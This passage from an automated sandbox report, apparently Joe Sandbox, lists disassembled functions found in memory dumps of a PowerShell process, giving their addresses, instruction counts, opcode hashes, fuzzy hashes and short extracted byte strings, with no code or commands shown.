                                      • Opcode ID: be1a73642e43db0b82ba9a21bf60a11c0a0a055982b26eae0e4bb3f98768d008
                                      • Instruction ID: 98be8ddb3547be32551ce1b7fd24a9904a01c01d069c0315249ff71a374fbd0a
                                      • Opcode Fuzzy Hash: be1a73642e43db0b82ba9a21bf60a11c0a0a055982b26eae0e4bb3f98768d008
                                      • Instruction Fuzzy Hash: 5D3184B4B40218ABD7049764C951BAFBBA3DB94314F20C124E9016F795CFB99C45CBE1
                                      Function 00EC2F50 Relevance: .5, Instructions: 518COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93a5512cc513ded99c1c19f446106a729e3c53d9a31f61477086ee9b7adf0997
                                      • Instruction ID: 2feba780f4dd4d3048819cfd02b6778be0cd559ab2fb4ae07f55963a2bbdfc7e
                                      • Opcode Fuzzy Hash: 93a5512cc513ded99c1c19f446106a729e3c53d9a31f61477086ee9b7adf0997
                                      • Instruction Fuzzy Hash: ED223874A012099FCB15CFA8C594AAEFBB2FF48314F25C559E815AB365C732ED42CB90
                                      Function 00EC39B0 Relevance: .3, Instructions: 318COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5264749fb6a2cccfaf66264cf3899cdc6d83e813b49df5575fee0b36b5824295
                                      • Instruction ID: 135d1a187ea6ed82f4fc46043dd2376e86071deedaa44d70c1b4db9e36e60a36
                                      • Opcode Fuzzy Hash: 5264749fb6a2cccfaf66264cf3899cdc6d83e813b49df5575fee0b36b5824295
                                      • Instruction Fuzzy Hash: 1BD1C374A00209AFCB15CFA8D584E9DBBB2FF48314F25D559E805AB365C732ED82CB90
                                      Function 00ECA1C0 Relevance: .3, Instructions: 312COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bb9aff99af535237ac86699bd7a0fe5afe98549ea48fc87a84c33ab5c029c68
                                      • Instruction ID: e58ca97a0d9441ecfa75698337aea42215cf254cda516a5d66de72c370bc1476
                                      • Opcode Fuzzy Hash: 8bb9aff99af535237ac86699bd7a0fe5afe98549ea48fc87a84c33ab5c029c68
                                      • Instruction Fuzzy Hash: B0C18F31A002488FCB14DFA4DA44E9DBBB6FF85318F19816DE406AB365CB75ED4ACB41
                                      Function 00ECA988 Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b846d23e01090864454abdf93223c63233b3805e55f851edd427382bd9663940
                                      • Instruction ID: 1c32d95f0e70a9bf7879b77b37cfb048d17f7c02b4df23db8ef1e3345b0adec2
                                      • Opcode Fuzzy Hash: b846d23e01090864454abdf93223c63233b3805e55f851edd427382bd9663940
                                      • Instruction Fuzzy Hash: 3C818130A002488FCB14DF68D980BADBBF2FF85318F28856DD416AB765DB75AC46CB51
                                      Function 00EC9A28 Relevance: .2, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b7a37599aa00a872acb3fbdb9aa65448192ed8c0489246db96c09383d1f7d6c
                                      • Instruction ID: 1aeed98135b8ef453f2dddec9a66b97b756c9859b2a08bb376f1df5ad53233ca
                                      • Opcode Fuzzy Hash: 8b7a37599aa00a872acb3fbdb9aa65448192ed8c0489246db96c09383d1f7d6c
                                      • Instruction Fuzzy Hash: AC718F30A112449FCB15CFA4D588EAEBBF2FF89314F1584A9E405AB362DB35ED46CB50
                                      Function 070935ED Relevance: .1, Instructions: 123COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ee2d63eacacc2252c3b9b87b51b50fbd0bc477db4666b2c341571ff535a66df
                                      • Instruction ID: d6d4b14d99e5be0b7d79cb3e404352c8a81be2ca2e154dab701df313dcd2581a
                                      • Opcode Fuzzy Hash: 0ee2d63eacacc2252c3b9b87b51b50fbd0bc477db4666b2c341571ff535a66df
                                      • Instruction Fuzzy Hash: 3C41E1F5B002029FCF60CE288941A6BFBE2AF92244F1982B5D9149B691D735D940DFA1
                                      Function 00ECA719 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d55039635cf36b9caa1c1e1e506c1540bbf7157217741bd3252564554784f1e8
                                      • Instruction ID: 5ac4d7925a212bf960e9a20c018292436d8e5b9e5f86f448f823173a675f70d0
                                      • Opcode Fuzzy Hash: d55039635cf36b9caa1c1e1e506c1540bbf7157217741bd3252564554784f1e8
                                      • Instruction Fuzzy Hash: A9418D346042048FDB14DF24D959BADBBB2FF89718F29906DE806EB3A0DB759C42CB51
                                      Function 00ECA973 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 188a5c1b96ae811653b69be2e33bf417fe2c2c62a0fdf637500de226ec2b270e
                                      • Instruction ID: d15486881a78f717cfda6ab2c4a5122f910c3ccf1d9fd6490eeef890ba752970
                                      • Opcode Fuzzy Hash: 188a5c1b96ae811653b69be2e33bf417fe2c2c62a0fdf637500de226ec2b270e
                                      • Instruction Fuzzy Hash: B6416D70A00208DFDB14DFA5C984B9DBBB2BF85308F18857DD406AB2A5DBB5AC46CB41
                                      Function 07090E18 Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84f7e5687f444ad1ed005ef2af22f9872e417ed1d44f8c528d9afd0d86456afc
                                      • Instruction ID: 39a7197f364392a857f330d6c3d07ff136f35b96ce3f53c3aef31e195aaebdb0
                                      • Opcode Fuzzy Hash: 84f7e5687f444ad1ed005ef2af22f9872e417ed1d44f8c528d9afd0d86456afc
                                      • Instruction Fuzzy Hash: F2214CF130030BABCF645A6E881073BBADA9FC4719F248539E505DB281DE75C981D361
                                      Function 00ECD328 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a5dae7e7206807e118b86ba8ab60b810069541bd97a6cbc0dbc754d2004292b
                                      • Instruction ID: 2283f30962aa3d13d13c4f447152a63129ba607930e5c62018ef76d08080eb4d
                                      • Opcode Fuzzy Hash: 7a5dae7e7206807e118b86ba8ab60b810069541bd97a6cbc0dbc754d2004292b
                                      • Instruction Fuzzy Hash: 3C312E30A041588FCB26DB64C955BEEB7B2BF89304F1444E9D409AB352DF369E82CF81
                                      Function 00EC3985 Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bdfc0533ea925cfd452170c4ed1e9250160f22179c72a4b58051f8c08794c3e
                                      • Instruction ID: 7fdcadfed277457a90f28b68dacfc04a005cedd1607ddb6b4058d1814b20c285
                                      • Opcode Fuzzy Hash: 6bdfc0533ea925cfd452170c4ed1e9250160f22179c72a4b58051f8c08794c3e
                                      • Instruction Fuzzy Hash: 7D316F75A042459FCB01CF59C990DAAFBF1FF49310B1582AAD848EB762C731EC52CBA1
                                      Function 00EC3925 Relevance: .1, Instructions: 81COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6263a6bbb386205019462f9bf7731e8d04e5190dc8fb399dfdc570bc146d65b9
                                      • Instruction ID: f697d1494c343417f46ee4eb5edd518c41767a9bfa252b168f3d584767375841
                                      • Opcode Fuzzy Hash: 6263a6bbb386205019462f9bf7731e8d04e5190dc8fb399dfdc570bc146d65b9
                                      • Instruction Fuzzy Hash: 3D316D74A042459FCB05CF59C990DAABBF1FF4D310B15819AD848EB762C732EC52CBA1
                                      Function 07090DFB Relevance: .1, Instructions: 80COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5be5e0f1c9256538a7c23be56ca6891d75d83292cb80f42047807bc3f72b2980
                                      • Instruction ID: 5f3687f0e028f5c133fc772eb9952e532dd55e0e2389ff6eaefb469e03865f4f
                                      • Opcode Fuzzy Hash: 5be5e0f1c9256538a7c23be56ca6891d75d83292cb80f42047807bc3f72b2980
                                      • Instruction Fuzzy Hash: 71218BF530438A7BCF540A7989007767FEA9F82708F18853AE644DB1C3D679C984C361
                                      Function 07090C08 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d0f83cdb5632cc8b4182ef1563139ab73e12b9530e278989a66daaf037101b4
                                      • Instruction ID: 498d5c0f62e7187edaa295afa6153a7523c7e44259dfe77a2aff2fa928f96da6
                                      • Opcode Fuzzy Hash: 3d0f83cdb5632cc8b4182ef1563139ab73e12b9530e278989a66daaf037101b4
                                      • Instruction Fuzzy Hash: BA0147B730031B9BCFA44A6AD40017AF7DADFC1622F14C53EE958C7210D636C805E360
                                      Function 0095D01D Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2642641691.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_95d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d7c12b729bcce74c51962d9c0bac587c5780334071cd9c036baa92f572352ed
                                      • Instruction ID: 045d0cae7cc2e70ef152bdcd0a36435e81d428ae5e58ba09b4a89a7a9b2e7f9f
                                      • Opcode Fuzzy Hash: 3d7c12b729bcce74c51962d9c0bac587c5780334071cd9c036baa92f572352ed
                                      • Instruction Fuzzy Hash: 1301F7714063409AD730CA36D984B67BF9CDF41322F18C819EC485A286C2789849C7B1
                                      Function 0095D005 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2642641691.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_95d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1caa38a45daa7e6c029fefea722695ba94e3b25ac36856ec2c874cc27cc112e
                                      • Instruction ID: bb23033b93ae31c4b7b0d9b68d979b54faadacbb83b3abc6cf505fe39971b721
                                      • Opcode Fuzzy Hash: e1caa38a45daa7e6c029fefea722695ba94e3b25ac36856ec2c874cc27cc112e
                                      • Instruction Fuzzy Hash: EC01406140E3C09ED7228B258894B52BFB8EF53225F19C5DBDC888F197C2695849C772
                                      Function 07096264 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aef2a68e520a1be5f2d3ad5b8796139176ec5180af460374e25e3204e76deec4
                                      • Instruction ID: 10580de32578f5b5e1d201fb95a415d4c6d1b681d90d30781181f6d3306d0fe6
                                      • Opcode Fuzzy Hash: aef2a68e520a1be5f2d3ad5b8796139176ec5180af460374e25e3204e76deec4
                                      • Instruction Fuzzy Hash: 6FF039752093818FDB668B60C864AA4BB71AF83214F2DC2EBD4808F1A7C737A845D752

                                      Non-executed Functions

                                      Function 07092D18 Relevance: 14.2, Strings: 11, Instructions: 420COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,S0l$,S0l$4'_q$4'_q$4'_q$4'_q$d5 k$tP_q$tP_q$xS0l$$_q
                                      • API String ID: 0-4000509439
                                      • Opcode ID: 1f936e7a93e462540784e89e79a0932432507b81ae2673b10075986364301edf
                                      • Instruction ID: 049b5fafdf067999a11e64e976968bf2cb84c9558b86ff302d38356e406670bd
                                      • Opcode Fuzzy Hash: 1f936e7a93e462540784e89e79a0932432507b81ae2673b10075986364301edf
                                      • Instruction Fuzzy Hash: F5D16CB1704346AFCF658B68881066BFBF2AF86310F1486BAD515CF252DB31C845DBA2
                                      Function 0709D64D Relevance: 14.0, Strings: 11, Instructions: 209COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$84.l$84.l$d%eq$d%eq$d%eq$d%eq$tP_q$tP_q$$_q
                                      • API String ID: 0-3744611123
                                      • Opcode ID: 4db3c45beb60d36ca53122505fcbf573462d6a27a7f7f5c7d63b4e42b3f22cbc
                                      • Instruction ID: eca99a5376ea1f7b944925d9ae1f1ca19859543285e878925e5908c439b55bb5
                                      • Opcode Fuzzy Hash: 4db3c45beb60d36ca53122505fcbf573462d6a27a7f7f5c7d63b4e42b3f22cbc
                                      • Instruction Fuzzy Hash: 377135B1B90206DFCF149F28D45067AFBE2AB85300F248679E8159B295DB35DC41DB91
                                      Function 07093248 Relevance: 12.8, Strings: 10, Instructions: 330COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q$&l$&l
                                      • API String ID: 0-3277706841
                                      • Opcode ID: febc3dae9979bfe2d4f105be706111945e66999f91e19333b13de3193ef5dd7d
                                      • Instruction ID: 86bbbdb3630e70d4eb49cb8b11f01d68e3aa82e23cc03aaafa7f2d74bc93bdd7
                                      • Opcode Fuzzy Hash: febc3dae9979bfe2d4f105be706111945e66999f91e19333b13de3193ef5dd7d
                                      • Instruction Fuzzy Hash: 72B189B27083469FCB154B798C0076AFFE2AF86210F15C6BBE455CB292DA31DC45CBA1
                                      Function 070955A0 Relevance: 12.8, Strings: 10, Instructions: 311COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                      • API String ID: 0-2601542563
                                      • Opcode ID: 56d0916ed3789fe5060ec65c437e184902382c2ce3c9c156ccbbc6ad8b75262c
                                      • Instruction ID: 3f157b0b6d70f20bbdad40ce331c7ba253ee53427871a1eb4eca2f2bff1041e5
                                      • Opcode Fuzzy Hash: 56d0916ed3789fe5060ec65c437e184902382c2ce3c9c156ccbbc6ad8b75262c
                                      • Instruction Fuzzy Hash: 15A144B1700306EFCF268A3B9C1466BFBE6AF82210F14857AD815DB2D1DB35CA51D7A1
                                      Function 0709DEA0 Relevance: 11.4, Strings: 9, Instructions: 196COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$84.l$84.l$tP_q$tP_q$$_q$(eq$(eq$(eq
                                      • API String ID: 0-913970858
                                      • Opcode ID: 93648b24ce42723699bfe88f8e5c2792f0a5b16962427356146645c4faa1b385
                                      • Instruction ID: c27106fa30bb1080d14bff7ef9e95eb70a278870e26ba59c1d09fc71776dd3f5
                                      • Opcode Fuzzy Hash: 93648b24ce42723699bfe88f8e5c2792f0a5b16962427356146645c4faa1b385
                                      • Instruction Fuzzy Hash: DF61D4B1700206DBCF64CE14C954BAAB7F6BF89711F1986B9E814AB394D731DC80DB91
                                      Function 07097060 Relevance: 10.5, Strings: 8, Instructions: 495COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                      • API String ID: 0-4243389563
                                      • Opcode ID: 385b0760fd3abaca4979968049ce092bca1aec10b13dce21601c5a69bab2fbdc
                                      • Instruction ID: 488740ab579ec86471924c127363084c44634e3457c8168f5273f1f5b2edf2c5
                                      • Opcode Fuzzy Hash: 385b0760fd3abaca4979968049ce092bca1aec10b13dce21601c5a69bab2fbdc
                                      • Instruction Fuzzy Hash: A9F13BB3724246DFCF598E79C84066EBBE6AFC1210F24867AE854CB351DB31C845D7A1
                                      Function 0709DB3C Relevance: 10.2, Strings: 8, Instructions: 164COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$84.l$TQdq$TQdq$tP_q$$_q$$_q$$_q
                                      • API String ID: 0-3547986534
                                      • Opcode ID: 418c5160be3063858645741975541a63df7c05cf79a06af3623bd712c0064150
                                      • Instruction ID: 515aa800ce829e290f714378b8f6140c9ee683b1d5116bddf9b908a6190ba084
                                      • Opcode Fuzzy Hash: 418c5160be3063858645741975541a63df7c05cf79a06af3623bd712c0064150
                                      • Instruction Fuzzy Hash: 0A5105F0781207EFDF688E14C5447AAB7F2AF42315F1882B6E8149B2A1C771DD80EB91
                                      Function 0709E558 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$84.l$tP_q$$_q$$_q$$_q
                                      • API String ID: 0-1918743496
                                      • Opcode ID: 3ee9f30f66442b6bded0b09d90b067b1b383b4f8fde8e4620491940c761229d6
                                      • Instruction ID: e12bafba7abcb278502585a328f80161b70734ae12fbe66e6df0a30ba724d1e3
                                      • Opcode Fuzzy Hash: 3ee9f30f66442b6bded0b09d90b067b1b383b4f8fde8e4620491940c761229d6
                                      • Instruction Fuzzy Hash: 3C61FFF2A0020AEFDF68CE54C544BBEB7E2AF45351F188675E8145B291D771DC80EBA2
                                      Function 07091F40 Relevance: 7.7, Strings: 6, Instructions: 182COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$t~rq$$_q$$_q$$_q
                                      • API String ID: 0-1340904987
                                      • Opcode ID: 259bf553f73a9f9777b055fba16623145770c714b7b24a053b0d5e69dcaa4834
                                      • Instruction ID: a4c3c3cfb7ab7a23a35f99641e921319016b6dd1fa288fa0f16a9b953f025288
                                      • Opcode Fuzzy Hash: 259bf553f73a9f9777b055fba16623145770c714b7b24a053b0d5e69dcaa4834
                                      • Instruction Fuzzy Hash: 2D518EB170434AAFCF555B79881027ABBE2BFC6300F24867AD515CB292EB35C845D7A2
                                      Function 0709D74E Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$84.l$d%eq$d%eq$d%eq$tP_q
                                      • API String ID: 0-3197480590
                                      • Opcode ID: a35458b483369b54272db006c176973e09d4d04b631111a6cccca0717edd763c
                                      • Instruction ID: d9b3840cc6e9afb391fcef5c40311431741ca9090718f8178ff1c899c6812bd5
                                      • Opcode Fuzzy Hash: a35458b483369b54272db006c176973e09d4d04b631111a6cccca0717edd763c
                                      • Instruction Fuzzy Hash: 5731C0B4B80205DFCF68DF18C450A6EFBE2BB88714F248669E815AB355D771EC41DB90
                                      Function 070900F0 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: T k$4'_q$4'_q$XY0l$XY0l
                                      • API String ID: 0-4206831673
                                      • Opcode ID: 3f6b15cea8a7e3976df48e601a22753e257dd40df51a61f81ebabd4ee481fc89
                                      • Instruction ID: 2b44af599fecfedad0bf23b77edd34bfd0e383d5002364337b4e14ef685b1673
                                      • Opcode Fuzzy Hash: 3f6b15cea8a7e3976df48e601a22753e257dd40df51a61f81ebabd4ee481fc89
                                      • Instruction Fuzzy Hash: EF7143B170524BCFCF558B78C8106AABBF2AF86210F24C2BBD545CB252DA31C841D7A1
                                      Function 0709E920 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84.l$XRdq$XRdq$tP_q$$_q
                                      • API String ID: 0-891492905
                                      • Opcode ID: 189f3cff7793a251c1a62baeb24dcdd32da575c19ca0cdeb778ceac48aa9e5bd
                                      • Instruction ID: 52de9ecfe914914205d92fad59af47f0984478548e02ea69efeedccd589fc2b7
                                      • Opcode Fuzzy Hash: 189f3cff7793a251c1a62baeb24dcdd32da575c19ca0cdeb778ceac48aa9e5bd
                                      • Instruction Fuzzy Hash: 7F414FB2A00209DFCF64CF15C544B6AB7E2BB89710F19C6B9D8156B2A1D771ED80DB90
                                      Function 0709B638 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$tP_q$$_q$$_q$$_q
                                      • API String ID: 0-3565727911
                                      • Opcode ID: 60bd51b1caec063505cdd3ab87b646e78adcb06d4228101c3306716a3b847095
                                      • Instruction ID: 90caa12ba2f9f6d7c114fa63421012c5442d0976db387aa04215c7940d3cf735
                                      • Opcode Fuzzy Hash: 60bd51b1caec063505cdd3ab87b646e78adcb06d4228101c3306716a3b847095
                                      • Instruction Fuzzy Hash: 5E31C2F0A00206EBDF64CE59E144B6AF7E2AF45730F14C37AE8259B290C775E940DB91
                                      Function 07091198 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q$&l$&l
                                      • API String ID: 0-2323376991
                                      • Opcode ID: 0479096f873b7e5653d5566fecc437ba41f23515eff82a2e5b1bf733ff8c4936
                                      • Instruction ID: 6b4e374e83d9e40ac2e988886400e2be9b345ca6ce83df81471d2372101f3005
                                      • Opcode Fuzzy Hash: 0479096f873b7e5653d5566fecc437ba41f23515eff82a2e5b1bf733ff8c4936
                                      • Instruction Fuzzy Hash: F8110AB134420FEBDF686B6AD804B6BB7D6ABD1721F24863AE855C7394C971C441D350
                                      Function 0709CEB8 Relevance: 5.5, Strings: 4, Instructions: 491COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
